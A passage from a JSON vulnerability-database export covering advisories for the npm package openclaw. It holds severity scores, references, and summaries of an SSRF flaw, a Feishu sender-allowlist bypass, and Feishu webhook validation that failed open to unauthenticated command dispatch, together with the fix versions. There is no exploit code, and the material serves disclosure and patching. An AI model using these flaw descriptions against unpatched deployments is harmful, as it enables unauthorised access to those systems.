"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35629", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35629" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions" }, { "reference_url": "https://github.com/advisories/GHSA-pg2v-8xwh-qhcc", "reference_id": "GHSA-pg2v-8xwh-qhcc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pg2v-8xwh-qhcc" }, { "reference_url": "https://github.com/advisories/GHSA-rhfg-j8jq-7v2h", "reference_id": "GHSA-rhfg-j8jq-7v2h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rhfg-j8jq-7v2h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-35629", "GHSA-rhfg-j8jq-7v2h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xpr3-hg3h-z3bz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89514?format=api", "vulnerability_id": "VCID-xryt-a83q-q7et", "summary": "OpenClaw: Feishu thread history and quoted messages bypass sender allowlist\n## Summary\nFeishu thread history and quoted messages bypass sender allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 Feishu because fetched quoted/root/thread context bypasses sender allowlists, and SECURITY.md does not exempt remote sender-allowlist bypasses.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `f45e5a6569aab1d58cc6de25b19f1dc4c8779b85` — 2026-03-31T19:43:54+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41406", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14323", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.1436", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14358", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41406" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/f45e5a6569aab1d58cc6de25b19f1dc4c8779b85", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/f45e5a6569aab1d58cc6de25b19f1dc4c8779b85" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-877v-w3f5-3pcq", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-877v-w3f5-3pcq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41406", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41406" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-thread-history-and-quoted-messages", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-thread-history-and-quoted-messages" }, { "reference_url": "https://github.com/advisories/GHSA-877v-w3f5-3pcq", "reference_id": "GHSA-877v-w3f5-3pcq", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-877v-w3f5-3pcq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41406", "GHSA-877v-w3f5-3pcq" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xryt-a83q-q7et" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90078?format=api", "vulnerability_id": "VCID-xsct-xjs7-nbab", "summary": "OpenClaw: Feishu webhook and card-action validation now fail closed\n## Summary\n\nFeishu webhook mode accepted missing `encryptKey` configuration as valid and blank card-action callback tokens as usable lifecycle tokens. Together, those fail-open paths could allow unauthenticated webhook or card-action traffic to reach command dispatch in affected deployments.\n\n## Impact\n\nA deployment using Feishu webhook mode without a configured `encryptKey`, or handling malformed card-action callbacks with blank callback tokens, could fail open instead of rejecting the request. Severity remains critical because affected webhook deployments expose a network-triggered path into OpenClaw command handling without the expected Feishu signature or replay protection.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` makes Feishu webhook and card-action validation fail closed. Webhook mode now refuses to start without an `encryptKey`, missing signing configuration returns invalid instead of valid, invalid signatures return `401`, and blank card-action callback tokens are rejected before dispatch.\n\nVerified in `v2026.4.15`:\n\n- `extensions/feishu/src/monitor.transport.ts` returns invalid when `encryptKey` is missing, refuses webhook mode without `encryptKey`, and rejects invalid signatures before JSON handling.\n- `extensions/feishu/src/card-action.ts` rejects blank callback tokens in the card-action lifecycle guard.\n- `extensions/feishu/src/monitor.webhook-security.test.ts` covers missing-`encryptKey` startup and transport rejection.\n- `extensions/feishu/src/monitor.card-action.lifecycle.test.ts` covers malformed blank-token card actions being dropped before handler dispatch.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `c8003f1b33ed2924be5f62131bd28742c5a41aae` via PR #66707\n\nThanks to @dhyabi2 for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44109", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00184", "scoring_system": "epss", "scoring_elements": "0.3993", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00184", "scoring_system": "epss", "scoring_elements": "0.39934", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.002", "scoring_system": "epss", "scoring_elements": "0.42032", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44109" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/c8003f1b33ed2924be5f62131bd28742c5a41aae", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/c8003f1b33ed2924be5f62131bd28742c5a41aae" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/66707", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/66707" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xh72-v6v9-mwhc", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-07T12:34:48Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xh72-v6v9-mwhc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44109", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": 